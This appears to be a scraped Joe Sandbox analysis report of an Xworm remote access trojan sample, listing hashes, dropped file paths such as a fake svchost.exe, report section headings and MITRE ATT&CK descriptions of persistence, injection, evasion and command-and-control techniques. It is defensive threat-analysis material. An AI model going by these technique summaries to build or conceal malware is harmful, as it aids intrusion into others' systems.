Instruction ID: d1dab3e2bb61a39521170f002d1c6f70f6768c6876015580e9484fca5e1e8cd7
Opcode Fuzzy Hash: 86d66a861d18499d3c8a30e7f6fe9af7062160d636314c2d9d2468d51cb34c69
Instruction Fuzzy Hash: AB51D336B0D6994FD391EBFCA4B11E93F74EF81315B4845BAD188CB283DE3864458784

Function 00007FFD348B0CE9 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3369495413.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffd348b0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1648fd9e2c17b644b797a4352dbd52ec475f419235c3c44da44f88159dc2b19
Instruction ID: 711fd698196f62e6c61bd9bfc3d7f199f8d6a1bebc01f82e4a434cc779fae4a9
Opcode Fuzzy Hash: f1648fd9e2c17b644b797a4352dbd52ec475f419235c3c44da44f88159dc2b19
Instruction Fuzzy Hash: 1331B221B1CA090FEB95BBEC58693BD77D2EF99311F1802BAE00DC32D2DD6868018391

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report a9YMw44iQq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\svchost.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14dqgwaw.gpl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoanqvpi.wz1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fouwf2xn.jap.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fthmke1i.p2d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i424jzbq.gni.psm1

Windows Analysis Report
a9YMw44iQq.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre